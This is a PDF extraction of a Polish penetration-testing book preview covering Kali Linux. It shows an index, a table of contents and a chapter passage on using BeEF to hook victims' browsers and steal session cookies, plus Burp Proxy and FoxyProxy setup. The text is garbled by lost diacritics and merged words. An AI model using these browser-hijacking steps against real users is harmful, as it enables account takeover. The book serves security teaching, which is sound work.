getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 6: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Spis tre ci

7

Rozdzia 8 Tworzenie raportoacutew ko cowych 301

Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307

Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319

Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323

Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327

Podsumowanie 327

Skorowidz 329

Kup książkę Poleć książkę

Spis tre ci

8

Kup książkę Poleć książkę

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

